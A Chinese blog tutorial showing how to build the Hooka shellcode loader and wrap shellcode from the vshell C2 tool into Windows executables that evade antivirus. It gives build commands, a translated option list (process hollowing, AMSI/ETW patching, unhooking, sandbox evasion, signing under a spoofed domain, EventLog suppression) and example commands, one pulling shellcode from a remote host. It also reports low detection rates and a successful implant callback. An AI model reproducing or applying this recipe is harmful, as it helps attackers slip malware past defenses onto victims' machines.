利用Hooka开源的多种功能shellcode加载器实现快速免杀火绒,静态360+360杀毒,微步查杀1,vt查杀7(教程)

免责声明:

本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在使用本文信息时,必须严格遵循适用的法律法规及服务协议,自行承担一切风险与责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。

项目介绍:

Hooka 能够生成具有多种功能的 shellcode 加载器。它还基于 BokuLoaderFreezeShhhloader 等其他工具,并尝试实现更多规避功能。

先安装Golang

wget https://go.dev/dl/go1.21.1.linux-amd64.tar.gz

然后执行解压安装

sudo tar -C /usr/local -xzf go1.21.1.linux-amd64.tar.gz

配置环境变量

echo 'export PATH=$PATH:/usr/local/go/bin' >> ~/.bashrc

source ~/.bashrc

验证是否安装成功

go version

下载好项目后打开

git clone https://github.com/D3Ext/Hooka

cd Hooka

执行make

发现出现的错误是因为 Go 在构建时尝试从 https://proxy.golang.org 下载依赖包,但由于网络问题(例如代理配置或无法访问外网),导致无法连接到 Go 模块代理服务。

配置 Go 使用国内镜像

go env -w GOPROXY=https://goproxy.cn,direct

go env | grep GOPROXY

执行完毕可以看见多了一个build的文件夹然后cd build

给与权限

chmod 777 hooka_linux_amd64

先用之前vshell的生成amd64位shellcode 放到同一文件夹下执行命令生成简单的 EXE 加载程序

./hooka_linux_amd64 -i shellcode.bin -o loader.exe

成功生成

使用参数我简单翻译了一点


| | | | ___ ___ | | __ __ _ | |

| |_| | / _ \ / _ \ | |/ / / _` | | |

| _ | | () | | () | | < | (| | ||

|| || \/ \/ ||\\ \__,| ()

Hooka 用法:

必需:

-i,--输入要注入的字符串有效负载原始格式,作为 PE、作为 DLL 或来自 URL

-o,--输出字符串输出文件的名称(即 loader.exe)

-f,--格式字符串要生成的有效负载的格式(可用:exe、dll)(默认 exe)

执行:

--proc 字符串 在需要给定执行技术时生成的进程(处于挂起状态)(默认 notepad.exe)

--exec 字符串 用于加载 shellcode 的技术(默认"SuspendedProcess"):

SuspendedProcess

ProcessHollowing

NtCreateThreadEx

EtwpCreateEtwThread

NtQueueApcThreadEx No-RWX

辅助:

-a,--arch 字符串要生成的加载程序的体系结构(默认为 amd64)

-c, --cert 字符串证书,用于对生成的加载程序进行签名(即 cert.pfx)

-d, --domain 字符串域,用于对加载程序进行签名(即www.microsoft.com)

编码:

--enc 字符串使用给定算法加密 shellcode(可用算法:aes、3des、rc4、xor)(默认无)

--sgn 使用 Shikata Ga Nai 对生成的加载程序进行编码(必须安装在路径上)

--strings 使用凯撒密码对字符串进行模糊处理

规避:

--unhook 要使用的字符串解钩技术(可用:完整版、peruns)

--sandbox 启用沙盒规避

--no-amsi 不修补 AMSI

--no-etw 不修补 ETW

--hashing 使用哈希检索函数指针

--acg 启用 ACG Guard 以防止 AV/EDR 修改现有的可执行代码

--blockdlls 防止非 Microsoft 签名的 DLL 注入子进程

--phantom 使用 Phant0m 技术暂停 EventLog 线程。需要高权限,否则加载程序会跳过此步骤

--sleep 使用自定义睡眠功能延迟 shellcode 执行

额外:

--calc 使用 calc.exe shellcode 测试加载程序功能(不提供输入文件)

--compress 使用压缩生成的加载程序Golang 编译器和 UPX(如果已安装)

-r, --rand 使用一组随机参数创建随机加载器(仅用于测试目的)

-v, --verbose 启用详细打印额外信息

-h, --help 打印帮助面板

示例:

hooka -i shellcode.bin -o loader.exe

hooka -i http://192.168.1.126/shellcode.bin -o loader.exe

hooka -i shellcode.bin -o loader.exe --exec NtCreateThreadEx --完全解除挂钩 --sleep 60 --acg

hooka -i shellcode.bin -o loader.dll --domain www.domain.com --enc aes --verbose

以下是vt+火绒+360+杀毒+微步的查杀效果

成功上线

项目地址:https://github.com/D3Ext/Hooka

相关推荐
独行soc41 分钟前
2025年渗透测试面试题总结-2025年HW(护网面试) 33(题目+回答)
linux·科技·安全·网络安全·面试·职场和发展·护网
花木偶2 小时前
【郑大二年级信安小学期】Day6:CTF密码学&杂项&工具包
安全·web安全·密码学
qq_312920113 小时前
主机安全-开源HIDS字节跳动Elkeid使用
安全
黑客老李10 小时前
EDUSRC:智慧校园通用漏洞挖掘(涉校园解决方案商)
服务器·前端·网络·安全·web安全
玥轩_52110 小时前
BUUCTF [WUSTCTF2020]spaceclub 1
安全·网络安全·ctf·buuctf·ascii·spaceclub·wustctf2020
薄荷椰果抹茶11 小时前
【网络安全基础】第七章---无线网络安全
网络·安全·web安全
weixin_4723394611 小时前
网络安全之重放攻击:原理、危害与防御之道
安全·web安全
sam.li11 小时前
WebView安全实现(一)
android·安全·webview
weixin_4723394611 小时前
网络安全之注入攻击:原理、危害与防御之道
安全·web安全
诗句藏于尽头19 小时前
完成ssl不安全警告
网络协议·安全·ssl